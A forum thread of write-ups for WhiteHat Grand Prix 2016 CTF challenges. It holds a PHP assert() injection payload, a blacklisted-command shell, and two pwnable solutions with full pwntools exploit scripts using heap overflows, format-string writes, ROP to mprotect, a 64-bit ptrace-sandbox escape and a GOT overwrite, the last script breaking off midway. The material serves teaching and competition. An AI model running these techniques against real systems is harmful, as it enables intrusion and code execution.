[Writeup] WhiteHat Grand Prix 2016 - Whitehat.vn

Thông báo

Collapse
No announcement yet.

[Writeup] WhiteHat Grand Prix 2016

Collapse
X
  • Lọc
  • Thời gian
  • Show
Clear All
new posts

  • [Writeup] WhiteHat Grand Prix 2016

    Topic này được tạo để các bạn chia sẻ, trao đổi, thảo luận về Writeup các bài thi tại WhiteHat Grand Prix 2016. Các bạn cùng tham gia nhé!

    Các bài thi gồm có:
    STT Tên món ăn Writeup1 Tên đội Writeup2 Tên đội
    1 Bánh bèo bì Bình Dương
    2 Bánh bột chiên
    3 Bánh bột lọc Writeup rawsec
    4 Bánh căn Ninh Thuận Writeup p4 Writeup CLGTftMeePwn
    5 Bánh canh Trảng Bàng – Tây Ninh Writeup CLGTftMeePwn
    6 Bánh Chưng Writeup CLGTftMeePwn
    7 Bánh cóng Sóc Trăng Writeup CLGTftMeePwn
    8 Bánh cuốn Thanh Trì Writeup qt Writeup ISITDTU
    9 Bánh đa kế Bắc Giang Writeup rawsec
    10 Bánh Giày Writeup rawsec Writeup ISITDTU
    11 Bánh ít lá gai Quy Nhơn Writeup rawsec
    12 Bánh khọt Bà Rịa – Vũng Tàu
    13 Bánh mì Writeup ISITDTU
    14 Bánh phu thê Đình Bảng
    15 Bánh răng bừa Hưng Yên
    16 Bánh tằm bì Bạc Liêu
    17 Bánh tráng cuốn thịt heo Đà Nẵng Writeup qt
    18 Bánh xèo Writeup ISITDTU
    19 Bún bò Huế
    20 Bún bò Nam Bộ Writeup 217
    21 Bún chả Hà Nội Writeup ISITDTU
    22 Cao lầu Writeup 217
    23 Cao lầu Hội An
    24 Chả cá lã vọng
    25 Cháo lươn Nghệ An
    26 Cơm gà Hội An Writeup DauGau
    27 Cơm hến Thừa Thiên Huế Writeup LS
    28 Cơm tấm Sài Gòn
    29 Gỏi cuốn
    30 Lẩu mắm U Minh
    31 Mì Quảng Writeup ISITDTU
    32 Nem rán Writeup DauGau
    33 Phở Hà Nội
    34 Phở khô Gia Lai
    35 Xôi ngũ sắc Tây Bắc
    Last edited by sunny; 21/01/17, 02:24 PM.

  • #2
    Banh bot loc

    Category Web Security | Teams having solved this 108 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

    Description:


    Solution:

    Here is the home page:
    Click image for larger version  Name:	1.png Views:	1 Size:	8,3 KB ID:	61703




    The login link go to http://web05.grandprix.whitehatvn.co...password=guest and says noob.
    Click image for larger version  Name:	2.png Views:	1 Size:	9,1 KB ID:	61704





    Let’s see source code of teh web page:

    Mã:
    <html>
        <title>hello</title>
        <body>
        <a href='index.php?username=guest&password=guest'>login</a><br>
        </body>Login to get our secret</html>
    <!-- index.php.bak -->
    Ok, let’s see index.php.bak:

    Mã:
    <?php
        function checklogin($username, $password, $key, $secret)
        {
            if($username.$key == md5($password))
            echo $secret;
        else echo "noob";
        }
    $key = "1337";
    $secret = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    echo "<html>
        <title>hello</title>
        <body>
        <a href='index.php?username=guest&password=guest'>login</a><br>
        </body>";
    if (isset($_GET['username'])&&isset($_GET['password']))
        {
            checklogin($_GET['username'],$_GET['password'],$key,$secret);
            die(0);
        }
    echo "Login to get our secret";
    echo "</html>";
    ?>
    Ok so the login checks that the concatenation of the username and the key is equal to the md5 hash of the password.

    So we need to find a hash like ????????????????????????????1337 (28 random hex chars and 1337).

    I first thought to download a md5 hash dictionary but I didn’t wanted to wait during teh download.

    So I went to md5db.net and looked for a hash beginning with 0000, did a CTRL + F to find 1337 and finaly found one: # 13381 Hash 0000dd456d15560290351cb4e6311337 Word hdtfz.

    So we get:
    • username: 0000dd456d15560290351cb4e631
    • key: 1337
    • password: hdtfz
    I submited the url: http://web05.grandprix.whitehatvn.co...password=hdtfz and got the flag

    Mã:
    WhiteHat{92ab818618fee438a1ea3944b5940237975f2b1d}
    Click image for larger version  Name:	3.png Views:	1 Size:	15,4 KB ID:	61705




    Last edited by whf; 27/12/16, 11:55 PM.

    Comment


    • #3
      Banh da Ke


      Category Miscellaneous | Teams having solved this 50 | Point 100 | Author: WhiteHat Wargame | Writeup: rawsec

      Description:


      When you gather all part of flag. Let's submit: WhiteHat{SHA1(flag)}
      nc misc04.grandprix.whitehatvn.com 23403
      nc bakmisc04.grandprix.whitehatvn.com 23403
      http://material.grandprix.whitehatvn...9fc4fabb47.zip
      http://bakmaterial.grandprix.whiteha...9fc4fabb47.zip
      Alternative server on amazon in case of low traffic:

      http://54.183.97.137/gp2016/Misc04_b...9fc4fabb47.zip
      create_folder_player.py

      Mã:
      import os
      import random
      flag = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
      count = 0
      length = len(flag)
      print length
      arr = random.sample(range(0,10000),length)
      arr = sorted(arr)
      for k in range(0,10000):
          try:
              os.mkdir(str(k))
          except:
              pass
          if k in arr:
              f=open("./"+str(k)+"/"+os.urandom(8).encode("hex")+"."+os.urandom(8).encode("hex"),"w").write(str(flag[count]))
              count +=1
      mics.py

      Mã:
      #!/usr/bin/env python
      import os
      import re
      import sys
      blaclist = "cat|nano|less|tail|vim|head|apt|install|wget|more|emacs|vi|subl|pico|bash|sh|rm|sed|nl|flag.hihi|`|%|\$|chmod|python"
      myregrex = "\W*(?i)("+blaclist+")\W*"
      cmd = ""
      while(cmd != "exit"):
          sys.stdout.write("Input your command: \n")
          sys.stdout.flush()
          cmd = raw_input()
          check = re.findall(myregrex,cmd)
          if check!=[]:
              sys.stdout.write("rejected\n")
              sys.stdout.flush()
              continue
          try:
              #call()
              a ="XXXXXXXXXXXXX"
              a+=cmd
              os.system(a)
          except:
              sys.stdout.write("bad command\n")
              sys.stdout.flush()
      Solution:

      create_folder_player.py: there will be 10000 folders with one part of the flag in several of them choosen randomly.
      • misc.py: lol, the spell. blaclist vs blacklist.
      • misc.py: ok seriously, blacklist usage sucks so I wont do a script to send a ls for the all 10000 folders. I will simply find a command not blacklisted: grep.
      • grep is magic, you can use all kind of regex and use it recursively:
      Mã:
      Input your command:
      grep -r -E '*.*' .
      ./5256/7e8e1adc2c27d5ae.b20d7fe2eeee83a6:e
      ./5363/049185c04d8d4a6a.14b749db725281b6:p
      ./9149/e60247d6e9b86d66.538088287218f418:h
      ./6625/99c4b89e33717d68.4e7cfddc3ab792ab:m
      ./2961/af1fa87c94746adc.4ceba2ad4425295a:H
      ./5360/3b1d1d39b7cdfc5e.b3d700c19f7da568:3
      ./7520/be92bc1c03188333.8a0acf56d05e21f2:D
      ./9460/0990eb1ff5a0f0f4.2b8448627eda707d:4
      ./7261/85c5e9b11412182b.c8aa64a3e89d6116:4
      ./4464/bfb49af4d0d18330.0e0a92989ea0cd16:{
      ./8447/1383404de7cf99d1.801ee7e580554bf7:r
      ./9817/abb9dad1b91251c0.8aca51ae85b0a5a3:}
      ./2464/91001f84e6b7043c.362d39207f7113d5:e
      ./6089/0da7f2cf81b578bc.64aceb97e90d59b8:4
      ./7265/0d1d93183a71652c.f62fd332e6a893c7:n
      ./8042/45b7f42e37a7036d.4649801c191cd850:t
      ./8566/eb0eac89c6af6941.a01ee5abd0018d64:y
      ./1490/ce66a0652ef071e2.8e59cb623f5044db:i
      ./3391/d5bb02174118cd0a.8452e896dc972780:a
      ./9729/ff958bf095684403.ba220df0c0a00cbc:d
      ./5627/39835fcae4e0fb1e.d63a2b4f7cd6cc4d:_
      ./5754/01b98e405d1a6f5e.dfea13f68bf1d28c:c
      ./2124/0388bdb00dff778b.cf361e5e8cba7330:t
      ./8919/8b998e1b2d84792e.05c56576bc8a640c:_
      ./251/01fbe27318a591b2.32905c5f1c5d5be2:W
      ./6805/421c3e7b161f09e6.cb2d792b88d852d3:_
      ./7615/40672c2915963dc7.23d290b7ab5a23fe:_
      ./4983/29a3e67904c136c1.82698942425d3172:k
      ./4091/5d4d11679777c463.54a739cf22f2147f:t
      ./1477/76ed9a66da76f47c.fffc5ebba341f304:h
      ./6428/4ab16af8f7bea2ca.f326ac02efddd099:l
      ./9664/3a309f1c601603e8.949523481193df68:r
      • Save the output in a text file.
      • Let’s order that with a ruby script:
      Mã:
      #!/usr/bin/ruby
      arr = []
      File.open('misc04.txt').each do |line|
          # math the folderName, fileName and content of each file (one char)
          regex = line.match(/\/([0-9]{1,4})\/([a-f0-9]{16}\.[a-f0-9]{16}):(.)/)
          folderName = regex.captures[0]
          fileName = regex.captures[1]
          char = regex.captures[2]
          # convert folderName to int in order to be able to sort it the right way. Sort as int (2464 > 251), sort a string (2464 < 251).
          arr.push([folderName.to_i,fileName,char])
      end
      # sort by first col, so sort by fileName
      arr.sort!
      # display only chars (third column of each row)
      arr.each{|r| print r[2]}
      • Execute it:
      Mã:
      [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
      $ ruby sorted.rb
      WhiteHat{ke3p_c4lm_4nD_try_h4rd}
      • Format the flag (WhiteHat{SHA1(flag)}):
      Mã:
      [noraj@rawsec]–––––––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016]
      $ printf %s 'WhiteHat{ke3p_c4lm_4nD_try_h4rd}' | sha1sum
      1a05093adb0795d8e2f5b89985c43b85bcb11d19  -
      • Submit the flag: WhiteHat{1a05093adb0795d8e2f5b89985c43b85bcb11d19}.

      Comment


      • #4
        Banh can

        Category Web Security | Teams having solved this 29 | Point 100 | Author: WhiteHat Wargame| Writeup: p4

        Description:


        Solution:

        In the task we get a webpage with a form. We can input some data in the form and submit it, which causes redirection to:

        Mã:
        http://web04.grandprix.whitehatvn.com/index.php?hello=our_input
        And it prints out Hello our_input.

        There is also a hint in the source code that we can try calling function hint.

        After a while we figure out that the parameter name is the function name and the value is string argument. This means we can go to:

        Mã:
        http://web04.grandprix.whitehatvn.com/index.php?hint
        To call hint function. This functions shows us that there is a blacklist for some inputs:

        Mã:
        $blacklist = array("system", "passthru", "exec", "read", "open", "eval", "backtick", "", "_");`
        We quickly notice that there is one function missing here, which enables us to call any PHP code from a string parameter -assert.

        So we can call:

        Mã:
        http://web04.grandprix.whitehatvn.com/index.php?assert=phpinfo()
        And it shows us phpinfo, with list of all disabled PHP functions. It seems there is no way of getting a shell, but maybe we don't need it. We decide to read index.php just to see what exactly we're dealing with.

        While _ is blacklisted, we can just concatenate string with chr(95) instead so we call:

        Mã:
        http://web04.grandprix.whitehatvn.com/index.php?assert=assert(%27print(file%27.chr(95).%27get%27.chr(95).%27contents(%22index.php%22))%27)
        in order to call assert('file_get_contents("index.php")')

        and the flag is in the source code:

        Mã:
        WhiteHat{36b32e1f18a0da66de3b9dd29db947155b35320f}

        Comment


        • #5
          Com ga Hoi An

          Category Reverse Engineering | Teams having solved this 2 | Point 100 | Author: WhiteHat Wargame| Writeup: DauGau

          Description:


          Solution:

          Comment


          • #6
            Nem ran

            Category Reverse Engineering | Teams having solved this 35 | Point 100 | Author: WhiteHat Wargame | Writeup: DauGau

            Description:

            NOPQRSTUVWXYZ01234abcdefghijklm}
            n&lt;150
            Submit: WhiteHat{SHA1(flag)}

            http://material.grandprix.whitehatvn...767501bc79.zip
            http://bakmaterial.grandprix.whiteha...767501bc79.zip
            Alternative server on amazon in case of low traffic:

            http://54.183.97.137/gp2016/RE07_a65...767501bc79.zip

            Powered by ISCMU
            Solution:

            Comment


            • #7
              Cảm ơn Mod whf đã tổng hợp, các đội có thể gửi luôn writeup vào đây.
              Whitehat.vn

              Comment


              • #8
                Mình xin bổ sung writeup Bánh Xèo

                Comment


                • #9
                  Cảm ơn bài writeup của mod Sugi_b3o! Đối với những bài đã có writeup nhưng anh em có cách giải khác thì cứ mạnh dạn chia sẻ nhé.

                  Comment


                  • #10
                    Cao lau

                    Category: Pwnable | Teams having solved this: 1 | Point: 400 | Author: WhiteHat Wargame | Writeup: 217

                    Description:

                    nc pwn02.grandprix.whitehatvn.com 23502

                    nc bakpwn02.grandprix.whitehatvn.com 23502

                    http://material.grandprix.whitehatvn...18ef6b0868.zip

                    http://bakmaterial.grandprix.whiteha...18ef6b0868.zip

                    Alternative server on amazon in case of low traffic:

                    http://54.183.97.137/gp2016/Pwn02_cd...18ef6b0868.zip
                    Solution:

                    Basic Info

                    Attachments are two 32bit ELFs and one plaintext: note_trial_1, ptrace_32, blacklist.txt
                    Click image for larger version  Name:	4checksec.png Views:	1 Size:	64,5 KB ID:	61720




                    The note_trial_1 binary is Full RELRO but no PIE enable. While it do have canary, the checksec of pwntools might have bugs.

                    The ptrace_32 binary is a sandbox, which use ptrace to forbid its child(i.e note_trial_1) from using syscalls listed inblacklist.txt.

                    We will see the forbidden syscalls later, let's focus on functions of note_trial_1 first.

                    Functions

                    (Only important functions are listed)
                    • Initialize notes:
                    Mã:
                    /*
                    struct Note {
                      char name[32];
                      char date[32];
                      char body[300];
                    }; */
                    for(i = 0; i <= 99; ++i ) {
                      pool[i] = (Note *)malloc(364);
                      memset(pool[i], 0, 364);
                    }
                    /* global variables */
                    total = 0;
                    cafe = 0xcafebabe;
                    • Generate license:
                    Mã:
                      
                    unsigned int seed;
                    buf = (unsigned int *)malloc(4u);
                    stream = fopen("/dev/urandom", "rb");
                    fread(&ptr, 4u, 1u, stream);
                    *buf = ptr;
                    fclose(stream);
                    srand(*buf);
                    for(i = 0; i < 5; i++)
                      license[i] = rand() % 6969 + 1000;
                    • Briefly, reads 4 bytes from /dev/urandom as srand seed and generates a five number license. Keep in mind that the seed is recorded on a heap buffer.
                    • add:
                      • note = pool[total++];
                      • readline(note->name, 32)
                      • readline(note->date, 32)
                      • readline(note->body, 300)
                    • read:
                      • Input index
                      • Show contents of pool[index].
                    • teencode:
                      • Input index
                      • note = pool[index];
                      • convert content of note->body to leetcode(e.g. A->4, C->[, M->|V|).
                    • license:
                      • return if cafe != 0xcafebabe
                      • If input the correct five number license, will have format string vulnerability.
                      • cafe = 0xc4f3b4b3
                    Vulnerability

                    One vulnerability has been described above: if input the correct license then we can use the fmt string attack.

                    However, we don't know what the correct license is - if we don't know the random seed.

                    Another vulnerability is the command teencode, which converts M to |V|, K to |<, and thus makes the string longer than buffer size, leads to heap overflow.

                    Exploitation

                    Exploitation contains two parts, first part is to leak the seed and second part is use fsa to leak information and control eip.

                    Leak seed

                    First part is very easy.
                    Remember that the seed has been recorded on heap, which located right after the 100th note. So just simply use the commandteencode to make the 100th note's body "touch" the seed, then read the note will print the seed out.
                    Click image for larger version  Name:	2016-12-28_183722.jpg Views:	1 Size:	19,8 KB ID:	61721



                    Now we have the seed, and we write a simple C code to get the corresponding license.

                    get_license.cpp

                    Mã:
                    #include <cstdio>
                    #include <cstdlib>
                    int main() {
                      unsigned int seed;
                      scanf("%u", &seed);
                      srand(seed);
                      for(int i=0;i<5;i++)
                        printf("%d ",rand()%6969+1000);
                      puts("");
                      return 0;
                    }
                    Second part is the fmt string attacking.
                    However, there's a global variable cafe that make us only have one chance to use fsa. But the solution is easy, use fsa to overwrite cafe back to 0xcafebabe every time then we have unlimited times of fsa.

                    Information leak

                    With fsa, information leak is very easy.
                    Here we leak the libc, heap and stack address, and use DynELF of pwntools to get the remote glibc version.

                    Control EIP

                    With fsa and stack address, we can overwrite the return address and use ROP to control code flow.
                    While call system("/bin/sh") directly will fail! Yes, the execve syscall will be caught by the sandbox ptrace_32.

                    Since there's input length limit of the format string, use it to create ROP chain is inconvenient. We choose to put shellcode on heap and use ROP to call mprotect(heap, 0x1000, 7), then we can execute arbitrary code with (almost) unlimited length.

                    Bypass sandbox

                    It's time to see what syscalls are forbidden.
                    The syscall numbers listed in blacklist.txt are

                    Mã:
                    120 (clone)
                    2 (fork)
                    190 (vfork)
                    11 (execve)
                    37 (kill)
                    238 (tkill)
                    270 (tgkill)
                    We can use open + getdents + write to create a /bin/ls like shellcode. While this will find lots of directories and files exist on remote server, and none of them named "flag". So we choose to bypass the sandbox and get shell to make life easier.

                    Common two strategies to bypass the ptrace-base sandbox are:
                    1. simply fork/vfork/clone
                    2. kill parent process
                    Obviously we cannot use these two strategies.

                    The other common strategy is to change architecture. Though this binary is 32bit, it can switch to 64bit and use 64bit syscalls.
                    Change architecture to 64 bit is simple:

                    Mã:
                    push 0x33
                      call change_to_64
                      /* switch to 64 bits after retf */
                      jmp s64 /* same asm between 32 and 64 */
                    change_to_64:
                      retf
                    s64:
                      /* 64bit shellcode */
                    Notice that even we switch to 64bit arch, we still cannot use those forbidden syscall numbers. Unfortunately, the syscall number 2 is open in 64bit.

                    But this is not a problem, now we can use the normal strategy to escape from our parent - use fork.

                    Mã:
                    s64:
                      /* 64bit shellcode */
                      /* call fork() */
                      push 0x39
                      pop rax
                      syscall
                      test eax, eax
                      jne exit
                      /* shellcode without sandbox tracing! */
                      ...
                    exit:
                      /* call exit() */
                      push 0x3c
                      pop rax
                      syscall
                    Then we can get shell and find flag in one of lots files ;).

                    Exploit script:

                    Mã:
                    #!/usr/bin/python
                    
                    from pwn import *
                    import subprocess
                    import sys
                    
                    sft = shellcraft
                    
                    host, port = 'pwn02.grandprix.whitehatvn.com', 23502
                    if len(sys.argv) == 1:
                      host = '127.0.0.1'
                    
                    r = remote(host, port)
                    r.sendline('NAME')
                    r.sendline('EMAIL')
                    r.sendline('PHONE')
                    
                    def pt():
                      r.recvuntil('cmd#:')
                    
                    def add(name, date, body):
                      pt()
                      r.sendline('add')
                      r.sendline(name)
                      r.sendline(date)
                      r.send(body)
                    
                    context.clear(arch='amd64')
                    sc64 = asm(
                      sft.fork() +
                      '''
                        test eax, eax
                        jne exit
                        %s
                      exit:
                      ''' % sft.sh()+
                      sft.exit()+
                    '')
                    context.clear(arch='i386')
                    
                    sc = asm(
                      '''
                        push 0x33
                        call change
                        jmp s64
                      change:
                        retf
                      s64:
                      ''' ) + sc64
                    
                    # to read more shellcode
                    sc_read = asm(
                      '''
                        jmp real_sc
                      back:
                        pop esi
                        %s
                      jmp go
                      real_sc:
                        call back
                      go:
                      ''' % sft.read(0, 'esi', 0x1000)
                    )
                    
                    assert '\n' not in sc_read
                    assert '\x00' not in sc_read
                    add('123', '456', sc_read+'\n')
                    p = log.progress('adding notes')
                    for _ in xrange(98):
                      p.status(str(_))
                      add('123', '456', "A\n")
                    
                    add('123', '456', ("M"*2+'K'+p32(0xdeadbeef)).rjust(299, "A"))
                    p.success()
                    
                    r.sendline('cfont')
                    r.sendline('99')
                    r.sendline('type 4') # teencode
                    r.sendline('exit')
                    def read(idx):
                      pt()
                      r.sendline('read')
                      r.sendline(str(idx))
                      r.recvuntil('Body :')
                      return r.recvline()
                    s = read(99)
                    seed = u32(s[s.index(p32(0xdeadbeef))+4:-1])
                    log.info('seed = %x' % seed)
                    pp = process('./get_license')
                    pp.sendline(str(seed))
                    license = '-'.join(pp.recvline().strip().split(' '))
                    pp.close()
                    
                    def leak(addr):
                      pt()
                      r.sendline('license')
                      r.sendline(license)
                      r.sendline('Y')
                      cafe = 0x0804C204
                      st = 7
                      target = p32(0xcafebabe)
                      fmt = ''
                      now = 0
                      for i in xrange(len(target)):
                        t = ord(target[i]) - now
                        if t <= 0: t += 256
                        fmt += "%{}c%{}$hhn".format(t, st+i)
                        now = ord(target[i])
                      fmt += "@@@@%11$sQQQQ"
                      r.sendline(fmt)
                      r.sendline('zz')
                      r.sendline(p32(cafe)+p32(cafe+1)+p32(cafe+2)+p32(cafe+3)+p32(addr))
                      r.recvuntil('@@@@')
                      s = r.recvuntil('QQQQ')[:-4]
                      s += '\x00'
                      return s
                    
                    
                    free_got = 0x0804BFA4
                    libc_free = u32((leak(free_got))[:4])
                    #dynelf = DynELF(leak, libc_free-0x60000)
                    #print dynelf.lookup('system')
                    libc = ELF('libc.so.6')
                    libc.address = libc_free - libc.symbols['free']
                    log.info('libc @ %#x' % (libc.address))
                    environ = u32(leak((libc.symbols['environ']))[:4])
                    log.info('environ @ %#x' % (environ))
                    retaddr = environ - 288 # return address at stack of cmd_license
                    heap_base = u32(leak(0x0804c060)[:4]) - 0x170
                    log.info('heap base @ %#x' % heap_base)
                    
                    def write(addr, data):
                      # no need cafebabe any more!
                      pt()
                      assert len(data) % 4 == 0
                      r.sendline('license')
                      r.sendline(license)
                      r.sendline('Y')
                      st = 57
                      target = data
                      fmt = ''
                      now = 0
                      address = ''
                      for i in xrange(0, len(target), 2):
                        cur = ord(target[i]) | (ord(target[i+1]) << 8)
                        t = cur - now
                        if t <= 0: t += 65536
                        fmt += "%{}c%{}$hn".format(t, st+i/2)
                        now = cur
                        address += p32(addr + i)
                      r.sendline(fmt.ljust(200, '\x00') + address)
                      r.sendline('zz')
                      r.sendline('zz')
                      r.recvuntil('Thank')
                      r.recvuntil('<3\n')
                    
                    write(retaddr, flat(libc.symbols['mprotect'], heap_base+0x1b0, heap_base, 0x1000, 7))
                    r.send(sc)
                    r.interactive()
                    Flag:
                    Mã:
                    WhiteHat{3500ab3a525e759b258585f8494891435b5b16f8}
                    Last edited by whf; 28/12/16, 06:42 PM.

                    Comment


                    • #11
                      Bun bo Nam Bo

                      Category: Pwnable | Teams having solved this: 2 | Point: 500 | Author: WhiteHat Wargame | Writeup: 217

                      Description:


                      Solution:

                      Basic Info

                      Attachments are two 32bit ELF note, note_client and glibc libc-2.19
                      Click image for larger version  Name:	1.png Views:	2 Size:	34,9 KB ID:	61728




                      Normal protection, no PIE and Partial RELRO.

                      Directly run binary note will face a punch of hex:
                      Click image for larger version  Name:	2.png Views:	2 Size:	56,5 KB ID:	61729




                      While it looks like as normal menu challenge in IDA:
                      Click image for larger version  Name:	3.png Views:	1 Size:	22,5 KB ID:	61730




                      Why there's hex code when running?

                      After analysis, all I/O in note has been encrypt/decrypt in some way:
                      Click image for larger version  Name:	4.png Views:	1 Size:	26,0 KB ID:	61731



                      Let's skip here, and see what does note_client do first:

                      Directly run will get:
                      Click image for larger version  Name:	5.png Views:	1 Size:	21,9 KB ID:	61732



                      With IDA we found it want to read a file named config.txt, and connect the hostort described in config.txt.

                      So we create config.txt with content 127.0.0.1 31337, and use ncat to create a socket service of note listen at 127.0.0.1:31337, then note_client:
                      Click image for larger version  Name:	6.png Views:	1 Size:	40,8 KB ID:	61733



                      It works!

                      Actually note_client just do the I/O encrypt/decrypt to communicate with note. So we can skip the enc/dec algorithm in note now and just use note_client to interact with note.

                      Info of note
                      • Initialize: pool = (Pool*)malloc(0x1000), with structure:
                      Mã:
                      struct Pool
                      {
                        int limit;
                        int alive_amount
                        Note note[255];
                      };
                      struct Note
                      {
                        int inuse;
                        int sz;
                        char *content;
                      };
                      Don't care limit, alive_amount, they are used for limit the amount of note not exceed 255.

                      Commands:
                      • list: print the content of notes with inuse is true
                      • read:
                        1. check index is valid
                        2. check note[index]->inuse is true
                        3. show its date/name/body
                      • add: create a new note, steps show as follows:
                        1. loop pool to find the first note with inuse is false
                        2. Input a size, 32 <= size <= 1024
                        3. note->content = malloc(size+48)
                        4. Input name:readn(note->content, 31)
                        5. Input date:readn(note->content+32, 15)
                        6. Input body: readn(note->content+48, size)
                        7. note->inuse = true
                        8. note->sz = size
                      • free: specific a index
                        1. check index is valid
                        2. check note[index]->inuse is true
                        3. free(note[index]->content)
                        4. note->inuse = false
                      • edit: specific a index
                        1. check index is valid
                        2. check note[index]->inuse is true
                        3. Input name:readn(note->content, 31)
                        4. Input date:readn(note->content+32, 15)
                        5. Input body: readn(note->content+48, note->sz)
                      Vulnerability

                      There're many incorrect bounding check in note, but all of them are few dangers. The only crackable vulnerability is there's a buffer overflow in input function. The implementation of input looks like this: (not exactly because there's decrypt algo. in origin, follows is a simplified version):

                      Mã:
                      void readn(char *output, int len) {
                        int i=0, c;
                        while((c = getchar()) != '\n') {
                          output[i++] = c;
                          if(i >= len) break;
                        }
                        output[i] = c;
                      }
                      If the input length is exactly len and the last character is not line break, then will cause one null-byte overflow.

                      Exploit

                      Remain is our favorite heap exploit.


                      Information Leak

                      Since we can only overflow one null-byte, we must overflow the size of next heap chunk. First use the command add to construct our heap layout:

                      After add(36); add(36); add(316); add(36); add(36), heap will look like this:

                      Mã:
                      +---------------+---------+---------+------------------+---------+---------+-----------+
                      | pool: 0x1009  | 0: 0x59 | 1: 0x59 |     2: 0x171     | 3: 0x59 | 4: 0x59 | top_chunk |
                      +---------------+---------+---------+------------------+---------+---------+-----------+
                      Then free the first note(free(0)), and trigger overflow when editing the second note(edit(1)):

                      Mã:
                                 |------- 0xb0 ------|
                      +----------+---------+---------+----------------+-+---------+---------+-----------+
                      |  0x1009  | 0: 0x59 | 1: 0x58 | 2: 0x100(fake) | | 3: 0x59 | 4: 0x59 | top_chunk |
                      +----------+---------+---------+----------------+-+---------+---------+-----------+
                                 |  freed  |         | prev_size(0xb0)| |
                                 +---------+         +----------------+-+
                      Since the chunk size of note 2 has been changed to 0x100, which implys its prev_inuse bit is zero, now free it(free(2)) will trigger the chunk merge between note 0 and note 2:

                      Mã:
                      +----------+---------+---------+-----------+------+---------+---------+-----------+
                      |  0x1009  |            0x1b1              | 0x70 | 3: 0x59 | 4: 0x59 | top_chunk |
                      +----------+---------+---------+-----------+------+---------+---------+-----------+
                                           | 1: 0x58 | <-overlap!   ^ no use
                                           +---------+
                      So we create a large freed chunk with size 0x1b0, which overlap with the chunk of note 1 (great!).

                      Next we add(36):

                      Mã:
                      +----------+---------+---------------------+------+---------+---------+-----------+
                      |  0x1009  | 0: 0x59 |     0x159(freed)    | 0x70 | 3: 0x59 | 4: 0x59 | top_chunk |
                      +----------+---------+---------+-----------+------+---------+---------+-----------+
                                           | 1: 0x58 |
                                           +---------+
                      Now read(1) will leak the fd, bk of an unsorted bin chunk. And if we free(3) before read, we can leak libc and heap base simultaneously (unsorted bin double linked list).

                      Mã:
                                                             +----------+
                                                             |          v
                      +----------+---------+-----------------|---|------+---------+---------+-----------+
                      |  0x1009  | 0: 0x59 |  fwd: in libc, bck  | 0x70 |  freed  | 4: 0x58 | top_chunk |
                      +----------+---------+---------+-----------+------+---------+---------+-----------+
                                           | 1: 0x58 |
                                           +---------+
                      Overwrite GOT

                      After information leak, our target turn to overwrite the char *content of pool. If we success then we can modify it to point to GOT entry and use command edit to overwrite the GOT.
                      We can do this with the unlink function when merge two smallbin chunk.

                      free(0); add(108); add(52)

                      Mã:
                      +----------+-----------------+---------+------+------+---------+---------+-----------+
                      |  0x1009  |    0: 0xa1      | 2: 0x69 | 0xa8 | 0x70 |  freed  | 4: 0x58 | top_chunk |
                      +----------+---------+-------+-+-------+------+------+---------+---------+-----------+
                                           | 1: 0x58 | 
                                           +---------+
                      Notice that now edit note 1 can easily change the size and prev_size of note 2.

                      The plan is, we fake a chunk inside note 1 and make its fd, bk point to near the &note[1] in pool, when this fake chunk being unlinked, we can change the char* content in note[1] of pool.

                      Visualization:

                      edit(1): fake a chunk in note 1 and change the size and prev_size of note 2.

                      Mã:
                      heap           +----------+----------+
                      0x0000       : |   0x00   |  0x1009  |
                      0x0008(pool) : |   0xff   |   0x04   |
                                               ...
                      0x0020       : |   0x24   | h+0x1068 |
                                               ...
                      0x1008       : |   0x00   |   0xa1   |
                      0x1010(note0): |          |          |
                                               ...
                      0x1068(note1): |   0x00   |   0x41   | <- fake chunk
                      0x1070       : |  h+0x18  |  h+0x1c  | <- fake fd|bk
                                               ...
                      0x10a8       : |   0x40   |   0x68   |
                      0x10b0(note2): |          |          |
                                               ...
                      free(2):

                      Mã:
                      heap           +----------+----------+
                      0x0000       : |   0x00   |  0x1009  |
                      0x0008(pool) : |   0xff   |   0x04   |
                                               ...
                      0x0020       : |   0x24   | h+0x1068 |
                                               ...
                      0x1008       : |   0x00   |   0xa1   |
                      0x1010(note0): |          |          |
                                               ...
                      0x1068(note1): |   0x00   |   0x41   |<-+
                      0x1070       : |  h+0x18  |  h+0x1c  |  | merge
                                               ...            |
                      0x10a8       : |   0x40   |   0x68   +--+
                      0x10b0(note2): |          |          |
                                               ...
                      In the meanwhile will trigger unlink(0x1068), and the result is *(h+0x1c+8)=h+0x18
                      That is, the content pointer at h+0x24 being modified from h+0x1068 to h+0x18!

                      Edit again(edit(1)) can overwrite the char *content of note[1] itself, and edit again can modify the GOT.

                      In the exploit script we overwrite got_atoi to libc_system, so next time when prompt to input a index, we can input "sh" to get the shell.
                      Click image for larger version  Name:	7.png Views:	1 Size:	78,8 KB ID:	61734




                      BTW, because note_client will check some length information of input/output, so we cannot use it to communicate with service(will forbid us triggering bug). So we need to reverse what the IO enc/dec algorithm do and implement it ourselves. It's easy and details can be found in the exploit script.

                      BTW2, the exploit flow is same even if the binary harden with PIE and Full RELRO, just change the last step to overwrite the free_hook function in libc.

                      Exploit Script:
                      Mã:
                      #!/usr/bin/python
                      
                      from pwn import *
                      import sys
                      #context.log_level = 'debug'
                      #r = process('./note_client')
                      if len(sys.argv) > 1:
                        r = remote('103.237.98.97', 23501)
                      else:
                        r = remote('127.0.0.1', 31337)
                      
                      with open('table', 'rb') as f:
                        table = f.read()
                      
                      def decode(ci):
                        '''
                        tmp = s[i] & (s[i] ^ 0xFFFFFF7F);
                        s[i] = (*(&table[~(~i | 0xFFFFFF80)] + tmp) & 0x71 | ~*(&table[~(~i | 0xFFFFFF80)] + tmp) & 0x8E) ^ (s[i] & 0x71 | ~s[i] & 0x8E);
                        tmp2 = ~(s[i] & (s[i] ^ 0xFFFFFF80));
                        s[i] = ~(tmp2 | ~(_BYTE)tmp) | (s[i] & (s[i] ^ 0x80) & 0x7D | tmp2 & 0x82) ^ (tmp & 0x7D | ~(_BYTE)tmp & 0x82);
                        '''
                        ci = unhex(ci)
                        s = []
                        for b in ci:
                          s.append(ord(b))
                        for i in xrange(len(s)):
                          tmp = s[i] & (s[i]^0xffffff7f)
                          s[i] = s[i] ^ ord(table[(~(~i | 0xffffff80))+tmp])
                          tmp2 = ~(s[i] & (s[i]^0xffffff80))
